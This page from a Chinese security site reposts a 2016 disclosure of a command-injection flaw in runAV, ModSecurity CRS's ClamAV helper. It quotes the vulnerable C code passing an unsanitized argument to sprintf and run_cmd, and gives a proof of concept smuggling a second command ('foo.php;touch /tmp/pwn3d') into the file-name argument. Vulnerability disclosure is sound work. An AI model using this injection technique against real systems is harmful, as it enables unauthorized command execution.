首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 runAV mod_security - Arbitrary Command Execution 来源：https://www.modsecurity.org 作者：R-73eN 发布时间：2016-05-17   # Title : runAV mod_security Remote Command Execution # Date : 13/05/2016 # Author : R-73eN # Tested on : mod_security with runAV Linux 4.2.0-30-generic #36-Ubuntu SMP Fri Feb 26 00:57:19 UTC 2016 i686 i686 i686 GNU/Linux # Software : https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/util/av-scanning/runAV # Vendor : https://www.modsecurity.org/ #  ___        __        ____                 _    _  # |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    #  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    #  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ # |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____| # #       #include "common.h"   main(int argc, char *argv[]) {     char cmd[MAX_OUTPUT_SIZE];     char output[MAX_OUTPUT_SIZE];     int error;     char *colon;     char *keyword;       if (argc > 1) {         sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]);         output[0] = '\0';         error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);   +++++++++++++++++ OTHER CODE +++++++++++++++++++++++++++++++++     The argv[1] parameter is passed unsanitized to a sprintf function which sends the formatted output to the cmd variable, which is later passed as a parameter to a run_cmd function on line 14. https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/av-scanning/runAV/runAV.c#L14   POC:   snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ./runAV "foo.php;touch /tmp/pwn3d" sh: 1: /usr/bin/clamscan: not found 1 exec empty: OK snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ls -la /tmp/ | grep pwn3d -rw-rw-r--  1 snort snort    0 Maj 13 16:45 pwn3d snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Android Broadcom Wi-Fi Driver ·NRSS Reader 0.3.9 - Local Stac ·Microsoft Excel 2010 - Crash P ·Web interface for DNSmasq / Mi ·FTP JCL Execution ·eXtplorer 2.1.9 - Archive Path ·Linux Kernel bpf related UAF V ·Meteocontrol WEB’log - Admin ·Core FTP Server 32-bit Build 5 ·TP-Link SC2020n Authenticated ·Ipswitch WS_FTP LE 12.3 - Sear ·Dell SonicWALL Scrutinizer 11.   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved